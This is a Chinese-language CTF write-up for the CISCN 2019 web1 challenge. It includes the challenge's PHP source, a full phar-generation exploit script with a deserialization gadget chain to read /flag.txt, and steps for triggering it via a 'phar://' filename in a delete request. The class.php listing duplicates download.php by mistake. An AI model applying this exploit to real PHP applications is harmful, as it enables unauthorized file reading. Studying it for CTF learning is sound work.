这个题难在对代码的把握与理解
对于身经百战的老师傅来说,可能很快就拿下了
不过对于初学者来说可能比较难
本文视频:
https://www.bilibili.com/video/BV1GK411i7EQ/
注册后发现存在任意文件下载
我们把文件下载下来
有用的有:
index.php
session_start();if (!isset($_SESSION['login'])) {header("Location: login.php");die();}<html><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>网盘管理</title><head><link href="static/css/bootstrap.min.css" rel="stylesheet"><link href="static/css/panel.css" rel="stylesheet"><script src="static/js/jquery.min.js"></script><script src="static/js/bootstrap.bundle.min.js"></script><script src="static/js/toast.js"></script><script src="static/js/panel.js"></script></head><body><nav aria-label="breadcrumb"><ol class="breadcrumb"><li class="breadcrumb-item active">管理面板</li><li class="breadcrumb-item active"><label for="fileInput" class="fileLabel">上传文件</label></li><li class="active ml-auto"><a href="#">你好 echo $_SESSION['username']</a></li></ol></nav><input type="file" id="fileInput" class="hidden"><div class="top" id="toast-container"></div>include "class.php";$a = new FileList($_SESSION['sandbox']);$a->Name();$a->Size();
delete.php
session_start();if (!isset($_SESSION['login'])) {header("Location: login.php");die();}if (!isset($_POST['filename'])) {die();}include "class.php";chdir($_SESSION['sandbox']);$file = new File();$filename = (string) $_POST['filename'];if (strlen($filename) < 40 && $file->open($filename)) {$file->detele();Header("Content-type: application/json");$response = array("success" => true, "error" => "");echo json_encode($response);} else {Header("Content-type: application/json");$response = array("success" => false, "error" => "File not exist");echo json_encode($response);}
download.php
session_start();if (!isset($_SESSION['login'])) {header("Location: login.php");die();}if (!isset($_POST['filename'])) {die();}include "class.php";ini_set("open_basedir", getcwd() . ":/etc:/tmp");chdir($_SESSION['sandbox']);$file = new File();$filename = (string) $_POST['filename'];if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {Header("Content-type: application/octet-stream");Header("Content-Disposition: attachment; filename=" . basename($filename));echo $file->close();} else {echo "File not exist";}
class.php
session_start();if (!isset($_SESSION['login'])) {header("Location: login.php");die();}if (!isset($_POST['filename'])) {die();}include "class.php";ini_set("open_basedir", getcwd() . ":/etc:/tmp");chdir($_SESSION['sandbox']);$file = new File();$filename = (string) $_POST['filename'];if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {Header("Content-type: application/octet-stream");Header("Content-Disposition: attachment; filename=" . basename($filename));echo $file->close();} else {echo "File not exist";}
File类中
发现delete可以调用class.php的unlink函数,而unlink的值是可控的
而unlink可以触发phar反序列化,于是我们就利用其作为利用点
然后我们发现 close file_get_contents可以拿到flag
不过如何调用这个函数呢
我们看到了 User类的析构函数触发了 $this->db->close();
于是我们可以打算把db改成file对象就可以了
但是呢,有一个问题,就是说这样可以拿到flag,但是没有回显
因此这种方法走不通
于是我们就把目光投向了FileList的析构函数
其会把函数值打印出来
具体的运行流程可以参考视频,或者问问chatgpt
于是我们exp构造思路就是User的__destruct----Filelist->close()--------File->close()--------FIlelist->__destruct打印出result也就是close其返回值flag
下面是生成phar的php文件
error_reporting(0);class User {public $db;public function __destruct() {$this->db->close();}}class FileList {private $files;public function __construct() {$this->files = array();$this->results = array();$file = new File();array_push($this->files, $file);}}class File {public $filename = "/flag.txt";public function close() {return file_get_contents($this->filename);}}$a = new User();$a -> db = new FileList();$phar = new Phar("1.phar");$phar->startBuffering();$phar->addFromString("exp.txt", "test");$phar->setStub("<?php __HALT_COMPILER(); ?>");$phar->setMetadata($a);$phar->stopBuffering();
生成后我们把文件后缀改成gif或者png就可以上传了
后面我们开启抓包点击删除
然后修改数据包
将文件名前加一个phar://即可
原文始发于微信公众号(Zacarx随笔):ciscn2019_华北赛区_web1_phar反序列化_php代码审计
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论